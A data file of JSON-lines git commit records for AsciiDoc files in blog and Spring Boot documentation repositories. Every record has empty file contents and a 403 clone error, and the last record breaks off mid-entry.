{"commit":"ca527fc08aa878fd97c8cceed9edd934c2647aee","subject":"Update 2015-07-08-123.adoc","message":"Update 2015-07-08-123.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-08-123.adoc","new_file":"_posts\/2015-07-08-123.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e0973d6ada75abd2f6b2a6689bad35e6412cf9a","subject":"Update 2016-02-02-zxx.adoc","message":"Update 2016-02-02-zxx.adoc","repos":"drankush\/drankush.github.io,drankush\/drankush.github.io,drankush\/drankush.github.io","old_file":"_posts\/2016-02-02-zxx.adoc","new_file":"_posts\/2016-02-02-zxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/drankush\/drankush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba7d12c697242b5b688db9b36f33204254b6fd92","subject":"Clarify application.properties example","message":"Clarify application.properties example\n\nThe syntax was a bit tortured. This should clarify things and also\nde-emphasise the \"production\" use case for the file system\nproperties file (we want to be cloud native don't we?).\n","repos":"joansmith\/spring-boot,thomasdarimont\/spring-boot,cleverjava\/jenkins2-course-spring-boot,olivergierke\/spring-boot,neo4j-contrib\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,minmay\/spring-boot,mosoft521\/spring-boot,herau\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,hello2009chen\/spring-boot,hello2009chen\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,joansmith\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,akmaharshi\/jenkins,royclarkson\/spring-boot,ihoneymon\/spring-boot,kdvolder\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,royclarkson\/spring-boot,jmnarloch\/spring-boot,sbcoba\/spring-boot,bbrouwer\/spring-boot,bijukunjummen\/spring-boot,philwebb\/spring-boot,xiaoleiPENG\/my-project,ameraljovic\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,SaravananParthasarathy\/SPSDemo,zhangshuangquan\/spring-root,eddumelendez\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,ameraljovic\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,mdeinum\/spring-boot,htynkn\/spring-boot,thomasdarimont\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,dfa1\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,Nowheresly\/spring-boot,mrumpf\/spring-boot,jxblum\/spring-boot,sbuettner\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot-concourse,shakuzen\/spring-boot,rweisleder\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot,Nowheresly\/spring-boot,zhangshuangquan\/spring-root,michael-simons\/spring-boot,izeye\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,yhj630520\/spring-boot,NetoDevel\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,habuma\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,tiarebalbi\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,mbogoevici\/spring-boot,mrumpf\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,akmaharshi\/jenkins,michael-simons\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,vakninr\/spring-boot,ollie314\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,habuma\/spring-boot,wilkinsona\/spring-boot,sbuettner\/spring-boot,shangyi0102\/spring-boot,shakuzen\/spring-boot,mbogoevici\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,lexandro\/spring-boot,dreis2211\/spring-boot,afroje-reshma\/spring-boot-sample,herau\/spring-boot,jxblum\/spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,chrylis\/spring-boot,lburgazzoli\/spring-boot,brettwooldridge\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot-concourse,zhanhb\/spring-boot,bjornlindstrom\/spring-boot,chrylis\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rweisleder\/spring-boot,mrumpf\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,tsachev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,neo4j-contrib\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,joansmith\/spring-boot,sbcoba\/spring-boot,jbovet\/spring-boot,ptahchiev\/spring-boot,izeye\/spring-boot,htynkn\/spring-boot,olivergierke\/spring-boot,afroje-reshma\/spring-boot-sample,zhangshuangquan\/spring-root,isopov\/spring-boot,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,pvorb\/spring-boot,isopov\/spring-boot,ilayaperumalg\/spring-boot,candrews\/spring-boot,bbrouwer\/spring-boot,ameraljovic\/spring-boot,dreis2211\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,jvz\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,sebastiankirsch\/spring-boot,mbogoevici\/spring-boot,bbrouwer\/spring-boot,dfa1\/spring-boot,qerub\/spring-boot,joshthornhill\/spring-boot,philwebb\/spring-boot,javyzheng\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,linead\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,donhuvy\/spring-boot,deki\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,pvorb\/spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,kamilszymanski\/spring-boot,mbogoevici\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,bijukunjummen\/spring-boot,minmay\/spring-boot,eddumelendez\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,jbovet\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,bjornlindstrom\/spring-boot,izeye\/spring-boot,akmaharshi\/jenkins,chrylis\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,vakninr\/spring-boot,shangyi0102\/spring-boot,SaravananParthasarathy\/SPSDemo,DeezCashews\/spring-boot,kdvolder\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,wilkinsona\/spring-boot,bijukunjummen\/spring-boot,bclozel\/spring-boot,lburgazzoli\/spring-boot,felipeg48\/spring-boot,thomasdarimont\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,habuma\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,RichardCSantana\/spring-boot,jvz\/spring-boot,thomasdarimont\/spring-boot,hqrt\/jenkins2-course-spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,kamilszymanski\/spring-boot,SaravananParthasarathy\/SPSDemo,yhj630520\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,candrews\/spring-boot,zhanhb\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,olivergierke\/spring-boot,sebastiankirsch\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,yhj630520\/spring-boot,donhuvy\/spring-boot,jayarampradhan\/spring-boot,minmay\/spring-boot,zhangshuangquan\/spring-root,cleverjava\/jenkins2-course-spring-boot,akmaharshi\/jenkins,jxblum\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,tiarebalbi\/spring-boot,nebhale\/spring-boot,jmnarloch\/spring-boot,sbuettner\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot-concourse,lexandro\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot-concourse,lenicliu\/spring-boot,mbenson\/spring-boot,Buzzardo\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,i007422\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,isopov\/spring-boot,joansmith\/spring-boot,habuma\/spring-boot,jayarampradhan\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,mdeinum\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,mbogoevici\/spring-boot,sbuettner\/spring-boot,zhanhb\/spring-boot,xiaoleiPENG\/my-project,Buzzardo\/spring-boot,lucassaldanha\/spring-boot,lenicliu\/spring-boot,izeye\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,neo4j-contrib\/spring-boot,ilayaperumalg\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,bijukunjummen\/spring-boot,mrumpf\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,tsachev\/spring-boot,qerub\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,nebhale\/spring-boot,linead\/spring-boot,dreis2211\/spring-boot,eddumelendez\/spring-boot,RichardCSantana\/spring-boot,ihoneymon\/spring-boot,ihoneymon\/spring-boot,zhanhb\/spring-boot,ollie314\/spring-boot,ilayaperumalg\/spring-boot,sbuettner\/spring-boot,pvorb\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,i007422\/jenkins2-course-spring-boot,tsachev\/spring-boot,SaravananParthasarathy\/SPSDemo,yangdd1205\/spring-boot,isopov\/spring-boot,vakninr\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,bclozel\/spring-boot,minmay\/spring-boot,herau\/spring-boot,isopov\/spring-boot,nebhale\/spring-boot,xiaoleiPENG\/my-project,qerub\/spring-boot,yangdd1205\/spring-boot,kdvolder\/spring-boot,jvz\/spring-boot,ptahchiev\/spring-boot,rweisleder\/spring-boot,sebastiankirsch\/spring-boot,dfa1\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot,joshiste\/spring-boot,ollie314\/spring-boot,candrews\/spring-boot,brettwooldridge\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,habuma\/spring-boot,chrylis\/spring-boot,candrews\/spring-boot,shakuzen\/spring-boot,lburgazzoli\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,herau\/spring-boot,deki\/spring-boot,lexandro\/spring-boot,bjornlindstrom\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,lucassaldanha\/spring-boot,xiaoleiPENG\/my-project,drumonii\/spring-boot,lucassaldanha\/spring-boot,dreis2211\/spring-boot,jbovet\/spring-boot,wilkinsona\/spring-boot,lexandro\/spring-boot,mdeinum\/spring-boot,jvz\/spring-boot,deki\/spring-boot,javyzheng\/spring-boot,linead\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot-concourse,spring-projects\/spring-boot,herau\/spring-boot,SaravananParthasarathy\/SPSDemo,rweisleder\/spring-boot,jayarampradhan\/spring-boot,vakninr\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,mosoft521\/spring-boot,javyzheng\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,lenicliu\/spring-boot,neo4j-contrib\/spring-boot,lburgazzoli\/spring-boot,aahlenst\/spring-boot,Nowheresly\/spring-boot,vakninr\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,hqrt\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,habuma\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,ollie314\/spring-boot,mrumpf\/spring-boot,kamilszymanski\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lexandro\/spring-boot,jbovet\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,yangdd1205\/spring-boot,qerub\/spring-boot,javyzheng\/spring-boot,joshthornhill\/spring-boot,ilayaperumalg\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,joansmith\/spring-boot,spring-projects\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,dfa1\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,dfa1\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,vpavic\/spring-boot,donhuvy\/spring-boot,zhangshuangquan\/spring-root,thomasdarimont\/spring-boot,lenicliu\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c605675b7a580788c85dcc108782745c63c5fba7","subject":"Fix wrong class reference","message":"Fix wrong class reference\n\nCloses gh-4551\n","repos":"wilkinsona\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,mosoft521\/spring-boot,dreis2211\/spring-boot,joansmith\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,deki\/spring-boot,pvorb\/spring-boot,philwebb\/spring-boot-concourse,mbogoevici\/spring-boot,tiarebalbi\/spring-boot,linead\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,herau\/spring-boot,lexandro\/spring-boot,NetoDevel\/spring-boot,olivergierke\/spring-boot,eddumelendez\/spring-boot,zhanhb\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot-concourse,joansmith\/spring-boot,joshiste\/spring-boot,mrumpf\/spring-boot,ameraljovic\/spring-boot,SaravananParthasarathy\/SPSDemo,donhuvy\/spring-boot,mdeinum\/spring-boot,qerub\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,lucassaldanha\/spring-boot,jbovet\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,lburgazzoli\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,drumonii\/spring-boot,isopov\/spring-boot,vpavic\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,yhj630520\/spring-boot,DeezCashews\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,akmaharshi\/jenkins,hqrt\/jenkins2-course-spring-boot,yhj630520\/spring-boot,zhangshuangquan\/spring-root,isopov\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,shakuzen\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,vpavic\/spring-boot,bclozel\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,herau\/spring-boot,javyzheng\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,sebastiankirsch\/spring-boot,sebastiankirsch\/spring-boot,dfa1\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,scottfrederick\/spring-boot,zhangshuangquan\/spring-root,dreis2211\/spring-boot,shakuzen\/spring-boot,mrumpf\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,thomasdarimont\/spring-boot,lexandro\/spring-boot,qerub\/spring-boot,drumonii\/spring-boot,lburgazzoli\/spring-boot,kamilszymanski\/spring-boot,RichardCSantana\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,olivergierke\/spring-boot,sbuettner\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,olivergierke\/spring-boot,ameraljovic\/spring-boot,lenicliu\/spring-boot,mbenson\/spring-boot,mbenson\/spring-boot,qerub\/spring-boot,neo4j-contrib\/spring-boot,kamilszymanski\/spring-boot,dreis2211\/spring-boot,bclozel\/spring-boot,drumonii\/spring-boot,jvz\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,neo4j-contrib\/spring-boot,ollie314\/spring-boot,scottfrederick\/spring-boot,isopov\/spring-boot,sbcoba\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,izeye\/spring-boot,linead\/spring-boot,minmay\/spring-boot,javyzheng\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,sbuettner\/spring-boot,jvz\/spring-boot,brettwooldridge\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,ptahchiev\/spring-boot,yhj630520\/spring-boot,royclarkson\/spring-boot,chrylis\/spring-boot,ihoneymon\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,rajendra-chola\/jenkins2-course-spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,javyzheng\/spring-boot,izeye\/spring-boot,mosoft521\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,kamilszymanski\/spring-boot,dfa1\/spring-boot,linead\/spring-boot,yangdd1205\/spring-boot,spring-projects\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,aahlenst\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,felipeg48\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,kdvolder\/spring-boot,shangyi0102\/spring-boot,jvz\/spring-boot,dfa1\/spring-boot,yangdd1205\/spring-boot,ihoneymon\/spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,sbuettner\/spring-boot,hqrt\/jenkins2-course-spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,bclozel\/spring-boot,minmay\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,xiaoleiPENG\/my-project,Buzzardo\/spring-boot,lexandro\/spring-boot,ameraljovic\/spring-boot,jbovet\/spring-boot,Buzzardo\/spring-boot,bjornlindstrom\/spring-boot,eddumelendez\/spring-boot,thomasdarimont\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,lburgazzoli\/spring-boot,bjornlindstrom\/spring-boot,bbrouwer\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,sebastiankirsch\/spring-boot,ameraljovic\/spring-boot,NetoDevel\/spring-boot,bijukunjummen\/spring-boot,zhangshuangquan\/spring-root,qerub\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,mrumpf\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,Buzzardo\/spring-boot,habuma\/spring-boot,scottfrederick\/spring-boot,DeezCashews\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,cleverjava\/jenkins2-course-spring-boot,deki\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,bijukunjummen\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,candrews\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,sbcoba\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,lexandro\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,jmnarloch\/spring-boot,akmaharshi\/jenkins,sebastiankirsch\/spring-boot,dfa1\/spring-boot,hello2009chen\/spring-boot,jayarampradhan\/spring-boot,michael-simons\/spring-boot,sbuettner\/spring-boot,afroje-reshma\/spring-boot-sample,joansmith\/spring-boot,RichardCSantana\/spring-boot,hqrt\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,habuma\/spring-boot,izeye\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,javyzheng\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,pvorb\/spring-boot,philwebb\/spring-boot,jxblum\/spring-boot,tsachev\/spring-boot,minmay\/spring-boot,felipeg48\/spring-boot,SaravananParthasarathy\/SPSDemo,wilkinsona\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,afroje-reshma\/spring-boot-sample,hello2009chen\/spring-boot,sbcoba\/spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,RichardCSantana\/spring-boot,michael-simons\/spring-boot,deki\/spring-boot,yhj630520\/spring-boot,sbcoba\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,sebastiankirsch\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,jayarampradhan\/spring-boot,wilkinsona\/spring-boot,NetoDevel\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,mbenson\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot,lenicliu\/spring-boot,htynkn\/spring-boot,thomasdarimont\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,sbuettner\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,neo4j-contrib\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,bijukunjummen\/spring-boot,chrylis\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,herau\/spring-boot,Nowheresly\/spring-boot,ptahchiev\/spring-boot,lucassaldanha\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,tsachev\/spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,ameraljovic\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,olivergierke\/spring-boot,cleverjava\/jenkins2-course-spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,deki\/spring-boot,jvz\/spring-boot,bijukunjummen\/spring-boot,joansmith\/spring-boot,isopov\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,mdeinum\/spring-boot,candrews\/spring-boot,bclozel\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,vakninr\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,izeye\/spring-boot,herau\/spring-boot,royclarkson\/spring-boot,joansmith\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,dfa1\/spring-boot,vakninr\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,candrews\/spring-boot,vakninr\/spring-boot,aahlenst\/spring-boot,linead\/spring-boot,kdvolder\/spring-boot,brettwooldridge\/spring-boot,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,kamilszymanski\/spring-boot,minmay\/spring-boot,nebhale\/spring-boot,i007422\/jenkins2-course-spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,linead\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,ilayaperumalg\/spring-boot,zhangshuangquan\/spring-root,jmnarloch\/spring-boot,RichardCSantana\/spring-boot,olivergierke\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,bclozel\/spring-boot,xiaoleiPENG\/my-project,dreis2211\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,rweisleder\/spring-boot,mdeinum\/spring-boot,afroje-reshma\/spring-boot-sample,zhangshuangquan\/spring-root","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c93464edf8a9f98c737f97a4001e4b7eb2f89120","subject":"Update 2018-09-04-Some-Java-oddities.adoc","message":"Update 2018-09-04-Some-Java-oddities.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16f45395e88d0d416b0084768ebfac8b72456b5c","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cce22391fd1004bcde65e1ecdba36c8400af97a7","subject":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","message":"Publish 